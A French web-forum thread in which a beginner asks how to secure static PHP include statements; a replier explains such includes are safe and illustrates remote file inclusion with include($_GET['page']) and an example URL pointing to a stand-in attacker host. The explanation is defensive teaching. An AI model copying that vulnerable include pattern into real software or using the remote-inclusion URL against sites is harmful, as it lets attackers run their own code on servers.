A voir également:
- Extension php3 securise include ?
- Mode sécurisé samsung - Guide
- Changer extension fichier - Guide
- Extension .bin - Guide
- Extension dat - Guide
- Extension 7z - Guide
7 réponses
Non, changer l'extension ne sécurisera pas les include ! Et pourquoi php3 ? Que cherchez-vous à faire ?
bah tout simplement
pour securiser cette include :
<?php
include("news-accueil.php");
?>
j'ai mis
<?php
if ($_GET['news-accueil.php'] == "news-accueil.php")
{
include("news-accueil.php");
}
?>
mais ça ne fonctionne pas !
donc on ma conseiller dutiliser l'extension php3
pour securiser cette include :
<?php
include("news-accueil.php");
?>
j'ai mis
<?php
if ($_GET['news-accueil.php'] == "news-accueil.php")
{
include("news-accueil.php");
}
?>
mais ça ne fonctionne pas !
donc on ma conseiller dutiliser l'extension php3
Est-ce que news_accueil.php est le nom de la variable passée en paramètre dans l'URL ? L'extension php3 ne serrvira à rien, qui vous a conseillé ça ?
euh je ne comprend pas ce que vous voulais dire par passer en url je vous explique ma page :
dans la page d'accueil j'ai :
<?php
include("haut-accueil.php");
?>
mon texte
<?php
include("bas.php");
?>
et dans haut-accueil j'ai :
texte modifiable ...
<?php
include("news-accueil.php");
?>
et voila ça constitue ma page d'accueil et j'aimerais que mes include sois sécuriser mais je ne comprend pas ce que vous voulez dire par "le nom de la variable passée en paramètre dans l'URL"
Merci à vous de m'aider
dans la page d'accueil j'ai :
<?php
include("haut-accueil.php");
?>
mon texte
<?php
include("bas.php");
?>
et dans haut-accueil j'ai :
texte modifiable ...
<?php
include("news-accueil.php");
?>
et voila ça constitue ma page d'accueil et j'aimerais que mes include sois sécuriser mais je ne comprend pas ce que vous voulez dire par "le nom de la variable passée en paramètre dans l'URL"
Merci à vous de m'aider
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
La variable $_GET est utilisée pour récupérer les paramètres passés dans l'URL, via un formulaire par exemple, du genre :
où var1 et var2 sont les noms des variables et val1 et val2 les valeurs.
Donc $_GET['var1'] = val1.
Cependant vos include ne changeront pas dynamiquement (c'est-à-dire qu'à chaque fois que la page sera affichée, les mêmes include auront été effectués). Il n'y a donc pas besoin de sécuriser ça, le seul moyen de pirater serait de hacker le serveur et dans ce cas, même la sécurisation if / include ne servirait à rien !
Le danger viendrait d'un site où on passe la page à inclure par l'URL :
puis
car l'adresse pourrait être modifiée en :
ce qui serait une énorme faille en matière de sécurité !
En gros, pas de soucis à vous faire tant que vous utilisez les include comme vous le faites.
Dites-moi si j'ai été assez clair.
http://mon.site.fr/mapage.html?var1=val1&var2=val2
où var1 et var2 sont les noms des variables et val1 et val2 les valeurs.
Donc $_GET['var1'] = val1.
Cependant vos include ne changeront pas dynamiquement (c'est-à-dire qu'à chaque fois que la page sera affichée, les mêmes include auront été effectués). Il n'y a donc pas besoin de sécuriser ça, le seul moyen de pirater serait de hacker le serveur et dans ce cas, même la sécurisation if / include ne servirait à rien !
Le danger viendrait d'un site où on passe la page à inclure par l'URL :
http://mon.site.fr/mapage.html?page=news.php
puis
include( $_GET['page'] );
car l'adresse pourrait être modifiée en :
http://mon.site.fr/mapage.html?page=http://hacker.com/mapage.php
ce qui serait une énorme faille en matière de sécurité !
En gros, pas de soucis à vous faire tant que vous utilisez les include comme vous le faites.
Dites-moi si j'ai été assez clair.
